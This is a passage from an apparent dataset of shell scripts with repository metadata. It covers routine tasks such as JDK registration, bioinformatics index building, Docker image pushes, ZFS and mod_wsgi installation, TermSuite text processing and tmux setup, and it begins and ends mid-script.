    #bash ./start.sh  # project-level restart script (kept disabled)
    python3 /home/rslsync/vps/scrape_twitter/tw.py ErickZhou
else
    echo tw.py is OK!
fi
| true
|
52de64a1dc6fc512e6d3ce9742f2e190583f61ba
|
Shell
|
framiere/dotfiles
|
/bin/register-java.sh
|
UTF-8
| 496
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# Register every JDK found under ~/java with jenv (after clearing previous
# registrations), printing a colored Installed / NOT INSTALLED status per JDK.
JAVA_FOLDER=~/java
JENV_HOME=~/.jenv
JENV=$(brew --prefix)/bin/jenv
RED='\x1B[0;31m'
GREEN='\x1B[0;32m'
NC='\x1B[0m' # No Color
# Drop any previously registered JDKs first.
unregister-java.sh
# ROBUSTNESS FIX: the original `cd ${JAVA_FOLDER}` was unchecked — if the
# folder is missing, the jdk* glob would run against the current directory.
cd "$JAVA_FOLDER" || exit 1
for file in jdk*; do
  if [ -f "$file/bin/java" ]; then
    echo Register "$file"
    # Register the JDK under its directory name; jenv output is discarded.
    "$JENV" add "$file" "$file" > /dev/null 2>&1
    # Verify registration by counting it in jenv's installed versions.
    INSTALLED=$("$JENV" versions --bare | grep -c "$file")
    if [[ "$INSTALLED" -ne "1" ]]; then
      echo -e "${RED}NOT INSTALLED${NC}"
    else
      echo -e "${GREEN}Installed${NC}"
    fi
  fi
done
| true
|
0a9ced80d9988102a1ba95342aea7f31dcaa6165
|
Shell
|
rodriguezmDNA/rnaseqScripts
|
/Scripts/03a_makeBowtieIndex.sh
|
UTF-8
| 7,669
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
# j rodriguez medina
# Brady lab @ ucdavis
# Bowtie mapping
# Last modified
# 2017.10.jrm
# !!!!!!!!!!!!!!!!!!!!!!!!!!
# Don't use masked genomes
## Bowtie 2's command-line arguments and genome index format are both different from Bowtie 1's.
## When to use bowtie1 or bowtie2?
# If reads are >50bp, use bowtie2
# If reads are shorter than 50bp, use bowtie1 (aka, bowtie)
############
# Set options:
# {bwt1/bwt2} -> Align with bowtie1 OR bowtie2
# {cdna/genome} -> Align to cDNA or genome
## Used to check if index files already exist.
# Print usage/help to stderr and exit.
display_help() {
echo "Wrapper to build a reference index using bowtie{1/2}. " >&2
echo "If the script detects an existing index it won't create a new one." >&2
echo "At least one reference (cDNA or genome) needed [-c/-g]" >&2
echo "The script handles both or either, but needs at least one fasta file." >&2
echo ""
echo "Usage: $0 [option...] " >&2
echo ""
echo
echo " -h this useful help"
echo " -v bowtie version [bwt1/bwt2]"
echo " -g path to the genome fasta"
echo " -c path to the cDNA fasta"
echo "Optional: "
echo " -s suffix of the reference (default: \"ref\")"
echo
echo "example: ./03a_MakeBowtieIndex.sh -v bwt1 -s athIndex -g meta/genome_ath_TAIRv10.fa -c meta/cdna_ath_TAIRv10.fa"
echo "example 2 (no cDNA reference):
Scripts/03a_MakeBowtieIndex.sh -v bwt1 -s athIndex -g meta/genome_ath_TAIRv10.fa"
echo
#echo "Assumptions:"
#echo "* A directory with trimmed reads (with extension \"clean\" on a folder named '01_trimmed/')"
#echo "* The index of the reference is in a 'RefIdx/' directory with format: "
#echo " 'bwt{v}_reference'. ie, that the directory 'RefIdx/bwt1_cdna/' exists and contains index files"
#echo " built with the appropiate bowtie version"
echo -e "\n don't panic! "
echo " github: rodriguezmDNA "
echo " Last modified: 2017.10 - jrm - @ UC Davis "
exit 1
}
# No arguments at all -> show help (display_help exits).
if [ $# -eq 0 ]
then
display_help
fi
#### Some predefined options. Modify at your own risk
## Read data. This assumes you have the 01_trimmed folder after trimming with reaper.
#In params:
#genomeFasta=$DIR'/meta/genome_ath_TAIRv10.fa'
#cdnaFasta=$DIR'/meta/cdna_ath_TAIRv10.fa'
suffixOut='RefIdx' #Same as BuildIndex script
# Parse CLI flags: -v bowtie version, -g genome fasta, -c cDNA fasta,
# -s output suffix, -h help. (-r is accepted by the optstring but unused.)
while getopts ':hv:r:g:c:s:' option; do
case "$option" in
h) display_help
exit
;;
v) optionBowtie=$OPTARG
if [ $optionBowtie == 'bwt1' ] || [ $optionBowtie == 'bwt2' ]
then
echo ""
else
echo "Bowtie version not valid" >&2
display_help
fi
;;
g) genomeFasta=$OPTARG
;;
c) cdnaFasta=$OPTARG
;;
s) suffixOut=$OPTARG
;;
:) printf "missing value for -%s\n" "$OPTARG" >&2
display_help
exit 1
;;
\?) printf "illegal option: -%s\n" "$OPTARG" >&2
display_help
exit 1
;;
esac
done
shift $((OPTIND - 1))
######### Validate parameters
############################################
## Reference Option
if [ $optionBowtie == 'bwt1' ] || [ $optionBowtie == 'bwt2' ]
then
echo ""
else
echo "Invalid version please use 'bwt1' or 'bwt2'"
display_help
fi
# At least one of the two fasta references must be supplied.
if [[ -z $genomeFasta && -z $cdnaFasta ]] ; then
echo "Specify at least one reference fasta file for the index (-g fastaFile or -c fastaFile)"
display_help
fi
# ### If empty, set to default parameters
# if [[ -z $paramsFile ]] ; then
# echo "Bowtie parameters are empty, using default parameters" >&2
# case $optionBowtie in
# bwt1)
# # Bowtie 1 parameters I use
# bwtParams="-a --best --strata -n 1 -m 1 -p 4 --sam --tryhard"
# ;;
# bwt2)
# bwtParams="--time -p3 -k 10 --sensitive-local --no-unal"
# ;;
# # *)
# # echo "Option not valid" >&2
# # display_help
# # ;;
# esac
# else
# ### Read parameters
# bwtParams=`cat $paramsFile`
# fi
############################################
######### Start of the Analysis
############################################
############
## Record time
start_time=`date +%s`
## Get absolute path
#Get the full path of the current script: Go back one folder (from scripts to main)
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/.."
## Keep track of errors and outputs in a log.
logDir=$DIR/logs #Create log folder if it doesn't exist
if [ ! -d $logDir ]; then echo `mkdir -p $logDir`; fi
##
#logBow=$DIR/logs/bowStats"_"$optionAlign$optionBowtie #Create log folder if it doesn't exist
#if [ ! -d $logBow ]; then echo `mkdir -p $logBow`; fi
######
## Use the same script's name but add the log extension
## Two ways: split string by dots, keep the first part
# logPath=$DIR/logs/$(basename $BASH_SOURCE | cut -d . -f1).log # What if the script name has more dots?
## Removes specific extension:
logPath=$DIR/logs/$(basename $BASH_SOURCE .sh).$suffixOut$optionBowtie.log
## Create a log file and start writing.
echo `touch $logPath` #Create file to fill with log data
echo "Started on `date`" 2>&1 | tee $logPath
############
######
echo -e "Index Creation with option $optionBowtie \n" 2>&1 | tee $logPath
#### Functions
# Create $toDir if needed, logging either way. Uses globals: toDir, logPath.
checkDir () {
if [ ! -d $toDir ]; then
echo "Creating directory $toDir" 2>&1 | tee -a $logPath;
mkdir -p $toDir;
else
echo "Directory $toDir found" 2>&1 | tee -a $logPath;
fi;}
checkIndex () {
# Build the reference index only if no index file for the current mode
# already exists in $toDir.
#
# Reads globals set by the caller (the passed arguments are ignored, as in
# the original): toDir, pattern, bwt, buildIndex, logPath.
#
# BUG FIX: the original only tested for "$toDir/$suffixOut.1.ebwt" — the
# bowtie1 naming scheme. In bwt2 mode the index files end in .bt2, so an
# existing bowtie2 index was never detected and got rebuilt on every run.
# The caller already sets $pattern to the right glob (*.ebwt or *.bt2),
# so use it ($pattern must stay unquoted to glob-expand).
if ! ls $toDir/$pattern > /dev/null 2>&1; then
echo -e "Building index\n" 2>&1 | tee -a $logPath;
## Build index:
$bwt $buildIndex 2>&1 | tee -a $logPath;
else
echo -e "An index file was found, not building new index \n" 2>&1 | tee -a $logPath;
fi;}
########################################################################################################################
########################################################################################################################
# Out params:
# Index destination directories, one per reference type, named after the
# bowtie version (e.g. RefIdx/bwt1_genome).
genomeToPath=$DIR"/RefIdx/"$optionBowtie"_genome"
cdnaToPath=$DIR"/RefIdx/"$optionBowtie"_cdna"
## Choose flags for Bowtie or Bowtie 2
# Both branches do the same dance: set the globals (pattern, bwt, toDir,
# buildIndex) that checkDir/checkIndex read, then run them for genome + cDNA.
if [ $optionBowtie == "bwt1" ]; then
echo "Bowtie1"
# Set Global Parameters
pattern=*.ebwt
bwt=bowtie-build
## Genome
echo -e "\n Genome Index"
toDir=$genomeToPath
checkDir $toDir
# Check if index exists
buildIndex="$genomeFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
# cDNA
echo -e "\n Transcriptome Index"
toDir=$cdnaToPath
checkDir $toDir
# Check if index exists
buildIndex="$cdnaFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
else
## Bowtie 2
if [ $optionBowtie == "bwt2" ]; then
echo "Bowtie2"
# Set Global Parameters
pattern=*.bt2
bwt=bowtie2-build
## Genome
echo -e "\n Genome Index"
toDir=$genomeToPath
checkDir $toDir
# Check if index exists
buildIndex="$genomeFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
# cDNA
echo -e "\n Transcriptome Index"
toDir=$cdnaToPath
checkDir $toDir
# Check if index exists
buildIndex="$cdnaFasta $toDir/$suffixOut"
checkIndex $toDir $pattern $buildIndex $bwt
fi;fi;
########################################################################################################################
########################################################################################################################
## Record time
end_time=`date +%s`
echo -e "\n\tParameters used:
mode: $bwt
Genome FASTA: $genomeFasta
cDNA FASTA: $cdnaFasta
Suffix: $suffixOut" 2>&1 | tee -a $logPath
echo -e "\n\texecution time was `expr $end_time - $start_time` s." 2>&1 | tee -a $logPath
echo -e "\n\tDone `date`" 2>&1 | tee -a $logPath
##Done
| true
|
0c30c6eafc75de69293c0abe73e7b5720bbdffa0
|
Shell
|
cc-archive/mozcc
|
/build.sh
|
UTF-8
| 336
| 2.625
| 3
|
[] |
no_license
|
#! /bin/sh
# Bundle Build Script for MozCC
# (c) 2007, Nathan R. Yergler, Creative Commons
# Licensed to the public; see LICENSE for details
#
# Builds metacore.xpi and mozcc-ui.xpi from their subdirectories, then zips
# them with install.rdf into the final mozcc.xpi bundle.
# create XPI files for individual pieces
# ROBUSTNESS FIX: the original cd's were unchecked — if a subdirectory is
# missing, `zip -r ... *` would archive the parent directory's contents
# instead. Abort on a failed cd.
cd metacore || exit 1
zip -r ../metacore.xpi *
cd ..
cd mozcc-ui || exit 1
zip -r ../mozcc-ui.xpi *
cd ..
# create the bundle
zip -r mozcc.xpi install.rdf metacore.xpi mozcc-ui.xpi
| true
|
e5a925689737a749a1d6e76865b924092401132c
|
Shell
|
Brzhk/jenkins
|
/buildscripts/releaseSupportedAlpineImages.sh
|
UTF-8
| 974
| 3.65625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -x
# Push the supported blacklabelops/jenkins tags (latest, current, stable,
# rc, stable-rc) to the registry named by the first CLI argument. Non
# docker.io registries get the image re-tagged with the registry prefix
# before pushing.
set -o errexit # abort script at first error
# Setting environment variables
readonly CUR_DIR=$(cd $(dirname ${BASH_SOURCE:-$0}); pwd)
printf '%b\n' ":: Reading release config...."
source ${CUR_DIR}/release.sh
readonly PUSH_REPOSITORY=$1
readonly PUSH_JENKINS_VERSION=${JENKINS_VERSION}
readonly PUSH_JENKINS_STABLE_VERSION=${JENKINS_STABLE_VERSION}
# Re-tag a local image so it carries the target registry's prefix.
function retagImage() {
  local tag=$1
  local registry=$2
  docker tag -f blacklabelops/jenkins:${tag} ${registry}/blacklabelops/jenkins:${tag}
}
# Push one tag to the target registry, re-tagging first unless the target
# is docker.io (where the image already has the right name).
function pushImage() {
  local tag=$1
  local registry=$2
  if [ "$registry" != 'docker.io' ]; then
    retagImage ${tag} ${registry}
  fi
  docker push ${registry}/blacklabelops/jenkins:${tag}
}
for releaseTag in latest "${PUSH_JENKINS_VERSION}" "${PUSH_JENKINS_STABLE_VERSION}" rc stable-rc; do
  pushImage "${releaseTag}" "${PUSH_REPOSITORY}"
done
| true
|
d0b695a37e5ffd6d1900e8284a60c97b3caf5981
|
Shell
|
annonymouse/zfs-ubuntu-bootstrap
|
/bootstrap.sh
|
UTF-8
| 399
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
# Install native ZFS support on Ubuntu from the zfs-native PPA, load the
# kernel module, and verify via dmesg that it actually came up.
set -e
# apt and modprobe require root.
if [ `id -u` != "0" ] ; then
	echo "Need to run as root privlege"
	exit 2
fi
apt-add-repository --yes ppa:zfs-native/stable
apt-get update
apt-get install --yes debootstrap spl-dkms zfs-dkms ubuntu-zfs
modprobe zfs
# Running grep inside the if-condition keeps `set -e` from aborting on a
# miss (the original toggled set +e/-e around this check); matched dmesg
# lines still print to stdout exactly as before.
if ! dmesg | grep ZFS ; then
	echo "ZFS did not load correctly, fail fail fail"
	exit 2
fi
echo "Installed ZFS modules"
exit 0
| true
|
59ee0cfae3899729c164cc3ce54a62e676baa5d2
|
Shell
|
umm-csci-3412-fall-2021/lab-0-command-line-intro-uno
|
/compiling/extract_and_compile.sh
|
UTF-8
| 860
| 3.84375
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/bash
# Extract the NthPrime C sources from NthPrime.tgz, compile them into a
# single binary, and run it with the requested index N (first CLI argument).
requested_n=$1
# Unpack the gzipped tarball; it creates the NthPrime/ directory.
tar -xzf NthPrime.tgz
# Work inside the extracted tree; bail out if extraction did not create it.
cd NthPrime || exit
# Compile every C source file into one executable named NthPrime.
gcc ./*.c -o NthPrime
# Compute and print the Nth prime for the given N.
./NthPrime "$requested_n"
| true
|
a64bb63ca4054111cc584e4256597a062a575704
|
Shell
|
DanAnkers/crankcase
|
/cartridges/python-2.6/info/bin/app_ctl.sh
|
UTF-8
| 317
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Gear control wrapper: load the node config and the gear's per-file
# environment variables, then delegate to the abstract-httpd cartridge's
# app_ctl.sh with all original arguments.
source "/etc/stickshift/stickshift-node.conf"
source ${CARTRIDGE_BASE_PATH}/abstract/info/lib/util
# Import Environment Variables
# ROBUSTNESS FIX: the original ran `. $f` unquoted and with no existence
# check — with an empty ~/.env the glob stays literal and sourcing
# "~/.env/*" fails. Skip non-existent entries and quote the path.
for f in ~/.env/*
do
    [ -e "$f" ] || continue
    . "$f"
done
export APPDIR="${OPENSHIFT_GEAR_DIR}"
# Federate call to abstract httpd.
${CARTRIDGE_BASE_PATH}/abstract-httpd/info/bin/app_ctl.sh "$@"
| true
|
f67d2ffbe341703bd72bca20e71f6608e3551642
|
Shell
|
afreeorange/dotfiles
|
/.config/bash/conf.d/10-options.sh
|
UTF-8
| 327
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Interactive-shell option tweaks, enabled in a single shopt call:
#   cdspell      - autocorrect minor typos in `cd` path arguments
#   checkwinsize - refresh LINES/COLUMNS after each command (terminal resize)
#   cmdhist      - store a multi-line command as one history entry
#   histappend   - append to the history file instead of overwriting it
#   nocaseglob   - case-insensitive pathname globbing
shopt -s cdspell checkwinsize cmdhist histappend nocaseglob
| true
|
f5e689cedb8f8c52ad1682a86aa27a196b4166cf
|
Shell
|
JakeSeib/mbta_departures
|
/scripts/install_dependencies.sh
|
UTF-8
| 621
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# Provision a CentOS/RHEL host for the app: install build dependencies,
# deploy the Apache vhost config, and build/install mod_wsgi 4.7.1 against
# Python 3.8.
# EXPORT LANGUAGES
source /etc/profile.d/lang.sh
export LANG='en_US.UTF-8'
export LC_ALL='en_US.UTF-8'
# INSTALL DEPENDENCIES
yum install -y zlib-devel epel-release python38 python38-devel mysql-devel httpd-devel
yum -y groupinstall development
yum update -y
# COPY VirtualHost CONF
cp /var/www/basic_app/basic_app.conf /etc/httpd/conf.d/basic_app.conf
# BUILD MOD_WSGI AND INSTALL
wget "https://github.com/GrahamDumpleton/mod_wsgi/archive/4.7.1.tar.gz"
tar -xzf '4.7.1.tar.gz'
# ROBUSTNESS FIX: the original `cd` was unchecked — if the download or
# extraction failed, configure/make/make install would run in the current
# directory. Abort instead.
cd ./mod_wsgi-4.7.1 || exit 1
./configure --with-python=/usr/bin/python3.8
make
make install
cd ..
# Clean up the build tree and the downloaded tarball.
rm -rf mod_wsgi-4.7.1
rm 4.7.1.tar.gz
| true
|
e5c53873f17680e2841afb7c2508462ecb7b9da6
|
Shell
|
ImperadorSid/ubuntu-setup
|
/linux.sh
|
UTF-8
| 1,021
| 3.15625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Ubuntu post-install setup: installs user packages and snaps, removes
# unused ones, creates working directories and applies personal settings.
# Package lists are read from files under packages/.

# User packages
echo 'Instalando pacotes do usuário'
sudo apt install -y $(cat packages/user.txt)

# User snaps (plus authy, only available on the beta channel)
echo 'Instalando snaps'
sudo snap install $(cat packages/snaps-user.txt)
sudo snap install --beta authy

# Remove unused packages
echo 'Removendo pacotes não utilizados'
sudo apt purge -y $(cat packages/unused.txt)

# Remove unused snaps
echo 'Removendo snaps não utilizados'
sudo snap remove $(cat packages/snaps-unused.txt)

# Refresh, upgrade, then drop the apt package cache
echo 'Limpando cache do repositório de pacotes'
sudo apt update
sudo apt upgrade -y
sudo apt clean

# Folders used by later steps
echo 'Criando pastas'
mkdir ~/.cache/fish_compare
mkdir ~/.local/bin

# Fish: make it the login shell for user "impsid" and apply initial settings
echo 'Configurando o fish shell'
sudo chsh -s /usr/bin/fish impsid
./initial-settings.fish

# Keep the hardware clock in local time (dual-boot friendly)
echo 'Alterando funcionamento do relógio do sistema'
timedatectl set-local-rtc true

# KVM: allow the user to run virtual machines
echo 'Adicionando usuário ao grupo das máquinas virtuais'
sudo adduser impsid kvm

# Restore desktop configuration from settings.ini via DConf
echo 'Restaurando configurações via DConf'
dconf load / < settings.ini
| true
|
1fae04d9f5bf130b1d2b657dad5a4a6ce5a37ecb
|
Shell
|
VisaTM/termsuite-docker-galaxy
|
/TermSuiteWrapper.sh
|
UTF-8
| 6,460
| 3.609375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Wrapper around the TermSuite terminology extractor.
# Validates CLI options, symlinks the input corpus into a work directory,
# runs TermSuite with TreeTagger, and writes JSON and/or TSV output.

prog=`basename $0`
# Same visual width as $prog, made of non-breaking spaces, to align the
# continuation lines of the usage message.
subs=`echo -n $prog | perl -C7 -pe 's/./\x{00A0}/go;'`

USAGE=" \n"
USAGE+="Usage: $prog -d directory -f file -l (en|fr) -o output [ -t (json|tsv) ] \n"
USAGE+=" $subs [ -x memory ] [ -a option ]\n"
USAGE+=" $prog -h "

help=0
indice=0
ts="none"
while getopts a:d:f:hl:o:t:x: i
do
    case $i in
        a) extra[$indice]=$OPTARG
           indice=$((indice + 1));;
        d) dir=$OPTARG;;
        f) file=$OPTARG;;
        h) help=1;;
        l) language=$OPTARG;;
        o) output=$OPTARG;;
        t) ts=$OPTARG;;
        x) memory=$OPTARG;;
        \?) /bin/echo -e $USAGE >&2
            exit 1;;
    esac
done

# -h: print the full help text and exit.
if [ "$help" -gt 0 ]
then
    /bin/echo -e $USAGE
    /bin/echo ""
    /bin/echo "  -a   add an extra option. An option with an argument must "
    /bin/echo "       be written with an equal sign “=”, as for example:    "
    /bin/echo "       “-a --ranking-asc=frequency”                          "
    /bin/echo "  -d   indicates the temporary directory where the treatment "
    /bin/echo "       will be done"
    /bin/echo "  -f   gives the name of the file containing the list of text "
    /bin/echo "       files to process                                       "
    /bin/echo "  -h   displays that help and exits                           "
    /bin/echo "  -l   indicates the language to process (en|fr)              "
    /bin/echo "  -o   gives the name of the output file (TSV by default)     "
    /bin/echo "  -t   outputs the raw TermSuite file (JSON or TSV)           "
    /bin/echo "  -x   modifies the maximum memory allocation for the Java    "
    /bin/echo "       virtual machine (e.g. “512m” or “4g”)"
    /bin/echo ""
    exit 0
fi

# -x: validate the memory spec (e.g. 512m, 4g) and turn it into a JVM flag.
if [ -n "$memory" ]
then
    case $memory in
        [1-9][0-9]*[kmg]) memory="-Xmx$memory";;
        *) /bin/echo -e "\n$prog: wrong memory value “$memory”" >&2
           /bin/echo -e "\nIt should be a positive integer followed by one letter: m or g. " >&2
           exit 4;;
    esac
fi

# -d, -f and -o are all mandatory.
if [ -z "$dir" -o -z "$file" -o -z "$output" ]
then
    /bin/echo -e $USAGE >&2
    exit 1
fi

# -l must be one of the supported languages.
if [ -z "$language" ]
then
    /bin/echo -e $USAGE >&2
    exit 1
else
    case $language in
        en) ;;
        fr) ;;
        *) /bin/echo -e "\n$prog: wrong language option “$language”" >&2
           /bin/echo -e "\n$USAGE" >&2
           exit 1;;
    esac
fi

# -t must be json, tsv, or the internal default "none" (TSV via converter).
if [ -z "$ts" ]
then
    /bin/echo -e $USAGE >&2
    exit 1
else
    case $ts in
        json) ;;
        none) ;;
        tsv) ;;
        *) /bin/echo -e "\n$prog: wrong option “-t $ts”" >&2
           /bin/echo -e "\n$USAGE" >&2
           exit 1;;
    esac
fi

# Validate every extra TermSuite option passed with -a against the list of
# options accepted by the extractor.  (The previously duplicated
# --postproc-affix-score-th arm has been removed — the second copy could
# never match.)
indice=0
erreur=0
for option in ${extra[@]}
do
    case $option in
        --capped-size=*) ;;
        --context-assoc-rate=*) ;;
        --context-coocc-th=*) ;;
        --context-scope=*) ;;
        --contextualize) ;;
        --disable-derivative-splitting) ;;
        --disable-gathering) ;;
        --disable-merging) ;;
        --disable-morphology) ;;
        --disable-native-splitting) ;;
        --disable-post-processing) ;;
        --disable-prefix-splitting) ;;
        --enable-semantic-gathering) ;;
        --encoding=*) ;;
        -e=*) ;;
        --from-prepared-corpus=*) ;;
        --from-text-corpus=*) ;;
        -c=*) ;;
        --graphical-similarity-th=*) ;;
        --nb-semantic-candidates=*) ;;
        --no-occurrence) ;;
        --post-filter-keep-variants) ;;
        --post-filter-max-variants=*) ;;
        --post-filter-property=*) ;;
        --post-filter-th=*) ;;
        --post-filter-top-n=*) ;;
        --postproc-affix-score-th=*) ;;
        --postproc-independance-th=*) ;;
        --postproc-variation-score-th=*) ;;
        --pre-filter-max-variants=*) ;;
        --pre-filter-property=*) ;;
        --pre-filter-th=*) ;;
        --pre-filter-top-n=*) ;;
        --ranking-asc=*) ;;
        --ranking-desc=*) ;;
        --resource-dir=*) ;;
        --resource-jar=*) ;;
        --resource-url-prefix=*) ;;
        --semantic-dico-only) ;;
        --semantic-distance=*) ;;
        --semantic-similarity-th=*) ;;
        --synonyms-dico=*) ;;
        --tsv-hide-headers) ;;
        --tsv-hide-variants) ;;
        --tsv-properties=*) ;;
        --watch=*) ;;
        *) erreur=$((erreur + 1))
           echo "$prog: wrong option “$option”" >&2;;
    esac
done
if [ $erreur -gt 0 ]
then
    echo "$prog: too many errors! " >&2
    exit 2
fi

# Replace the first "=" of each extra option with a space, producing the
# space-separated argument string expected by the TermSuite CLI.
extras=${extra[@]/=/ }

if [ ! -f "$file" ]
then
    /bin/echo "$prog: cannot find file “$file”" >&2
    exit 2
fi

if [ ! -d "$dir" ]
then
    mkdir -p "$dir"
fi
if [ ! -d "$dir" ]
then
    /bin/echo "$prog: cannot create directory “$dir”" >&2
    exit 3
fi

if [ -f "$output" ]
then
    rm -f "$output"
fi

# Symlink every listed corpus file (one path per non-empty line) into the
# work directory with a .txt extension, as TermSuite expects.
perl -ne 's/^\s+//o; print if /\w/o;' "$file" |
sort |
while read x
do
    y=`basename $x .dat`
    ln -s "$x" "$dir/$y.txt"
done

# Run the extractor; with -t none, produce JSON internally and convert it
# to the simplified TSV with TermSuiteJson2Tsv.pl.
if [ $ts = "json" ]
then
    java $memory -cp /opt/TermSuite/termsuite-core-3.0.10.jar fr.univnantes.termsuite.tools.TerminologyExtractorCLI \
        -t /opt/treetagger/ -c $dir -l $language --json $output $extras
elif [ $ts = "tsv" ]
then
    java $memory -cp /opt/TermSuite/termsuite-core-3.0.10.jar fr.univnantes.termsuite.tools.TerminologyExtractorCLI \
        -t /opt/treetagger/ -c $dir -l $language --tsv $output $extras
elif [ $ts = "none" ]
then
    java $memory -cp /opt/TermSuite/termsuite-core-3.0.10.jar fr.univnantes.termsuite.tools.TerminologyExtractorCLI \
        -t /opt/treetagger/ -c $dir -l $language --json TS_output.json $extras
    TermSuiteJson2Tsv.pl -f TS_output.json -s $output
    rm -r TS_output.json
fi

rm -rf "$dir"
exit 0
| true
|
486ece8c4ed4bf428f93782d6c70bc26a6d5aa08
|
Shell
|
errcricket/Assembly_Pipeline
|
/ls_bsr/transcriptomics/make_plots.sh
|
UTF-8
| 1,122
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Helpers for LS-BSR transcriptomics output: normalise FASTA files in
# gene_candidates/ and render BSR-matrix plots via R.

# Re-wrap each candidate FASTA to a uniform line width (fasta_formatter),
# then rewrite its headers with alter_header.py.
function alter_headers
{
	for file in gene_candidates/B201_DL3Z3_aa.fasta gene_candidates/B241_DL3Z3_aa.fasta gene_candidates/B201_DL3Z3_nt.fasta gene_candidates/B241_DL3Z3_nt.fasta gene_candidates/B201_UL3Z3_aa.fasta gene_candidates/B241_UL3Z3_aa.fasta gene_candidates/B201_UL3Z3_nt.fasta gene_candidates/B241_UL3Z3_nt.fasta gene_candidates/B241_UL3selected_nt.fasta
	do
		fasta_formatter -i "$file" -o TEMP
		mv TEMP "$file"
		python alter_header.py "$file"
	done
}

# Plot the currently selected BSR matrix; earlier runs kept for reference.
function plot_images
{
	#Rscript plot_transcriptomics.R B201_U/B201_U_bsr_matrix.txt Up_B201.png B201 Up-Regulated
	#Rscript plot_transcriptomics.R B241_U/B241_U_bsr_matrix.txt Up_B241.png B241 Up-Regulated
	#Rscript plot_transcriptomics.R B201_D/B201_D_bsr_matrix.txt Down_B201.png B201 Down-Regulated
	#Rscript plot_transcriptomics.R B241_D/B241_D_bsr_matrix.txt Down_B241.png B241 Down-Regulated
	#Rscript plot_transcriptomics.R B241_U_misc/B241_U_misc_bsr_matrix.txt Up_B241_misc.png B241 Up-Regulated
	Rscript plot_transcriptomics.R B241_U_misc/B241_U_misc_bsr_matrix.txt TEMP.png B241 Up-Regulated
}

#alter_headers
plot_images
| true
|
9b02289344136c129f16002dac0f4de5f8c4aac5
|
Shell
|
johngodlee/miombo_tls
|
/src/ptx_split.sh
|
UTF-8
| 604
| 3.984375
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
# Split a multi-scan PTX point cloud into one file per scan.
#   $1 - input .ptx file
#   $2 - output directory
# Scan boundaries are located via the bare-integer header lines (array
# dimension rows) that begin each PTX scan.

if [ $# -ne 2 ]; then
	printf "Must supply two arguments:\n [1] input.ptx\n [2] output dir\n"
	exit 1
fi

# Get lines at which to split.
# rg -n prints "lineno:content"; sed keeps only the line number; awk keeps
# every odd match (the first of each header pair); tr joins them on one
# line; the final sed drops the leading match so csplit does not split at
# the very first header.
# NOTE(review): that final sed strips only a single leading digit — if the
# first header is on a multi-digit line number it may not be removed
# completely; confirm.
lines=$(rg -n --no-encoding -M 10 "^[0-9]+\s+?$" $1 |
	sed 's/:.*//g' |
	awk 'NR%2!=0' |
	tr '\n' ' ' |
	sed 's/^[0-9]\s//g')

# Get name of file without extension
noext="${1%.ptx}"
base=${noext##*/}

# If lines to split is empty:
if [ -z "$lines" ]; then
	# Copy file as is with suffix
	cp $1 "$2/${base}_0.ptx"
else
	# Split file by scans using array dimension rows in header as line ref
	csplit -f "$2/$base" -b "_%d.ptx" $1 $lines
fi
| true
|
e350d70ce34555b396ca508431dd18d36d0780a2
|
Shell
|
JRasmusBm/dotfiles
|
/bin/my-tmux
|
UTF-8
| 559
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/zsh
# Launch tmux, ensuring even pre-existing sessions see a current SSH agent
# socket via a stable symlink.
set -e

# Use zsh emulation locally when available so option handling is predictable.
if command -v emulate &> /dev/null;
then
  emulate -L zsh
fi

# Make sure even pre-existing tmux sessions use the latest SSH_AUTH_SOCK.
# (Inspired by: https://gist.github.com/lann/6771001)
# Only re-link when SSH_AUTH_SOCK points at a real socket, not at our own
# symlink (which would create a self-referencing link).
local SOCK_SYMLINK=~/.ssh/ssh_auth_sock
if [ -r "$SSH_AUTH_SOCK" -a ! -L "$SSH_AUTH_SOCK" ]; then
  ln -sf "$SSH_AUTH_SOCK" $SOCK_SYMLINK
fi

# If provided with args, pass them through.
if [[ -n "$@" ]]; then
  env SSH_AUTH_SOCK=$SOCK_SYMLINK tmux "$@"
else
  # Otherwise start/attach via the project-local .tmux script.
  # NOTE(review): source_tmux_script is not defined in this file —
  # presumably provided by the user's zsh environment; confirm.
  INITIATED_EXTERNALLY=${INITIATED_EXTERNALLY:-false} source_tmux_script "$(pwd)/.tmux"
fi
| true
|
104ef9ffcf3df99e0e81b4e2cab0efcde876fd83
|
Shell
|
engelfrost/generator-diversity-component
|
/app/templates/base/create_pot_and_po_files.sh
|
UTF-8
| 3,076
| 4.15625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Generate/update gettext POT, PO and JSON translation files for one
# Diversity component.
#
# Put this script in the PARENT DIR of your component, then run:
# sh create_pot_and_po_files.sh my-component-name
# To run on all components in a directory, run:
# find . -maxdepth 1 -mindepth 1 -type d -exec sh create_pot_and_po_files.sh {} \;

ROOT="$1"
COMPONENTNAME=${1##*/}

# Make sure the repo is up-to-date
# NOTE(review): newer git prints "Already up to date." (no hyphens);
# this equality check may need updating for such versions.
GIT_STATUS=`git --git-dir $ROOT/.git --work-tree=$PWD/$ROOT pull`
if [ "$GIT_STATUS" != "Already up-to-date." ]; then
    echo "Aborted."
    # Single quotes here: the original double-quoted string contained
    # unescaped backticks, which re-executed `git pull` a second time.
    echo 'Please verify that "git pull" succeeded.'
    echo "Then run the script again"
    exit
fi

PO_PATH="$ROOT/po/$COMPONENTNAME"
POTFILES_PATH="$PO_PATH/POTFILES.in"

# Create directories if necessary
mkdir -p "$PO_PATH"

# Create POT file
touch "$PO_PATH/messages.pot"

# Start the POTFILES.in list from scratch
if [ -e "$POTFILES_PATH" ]; then
    rm "$POTFILES_PATH"
fi
touch "$POTFILES_PATH"

# Some data to check against later
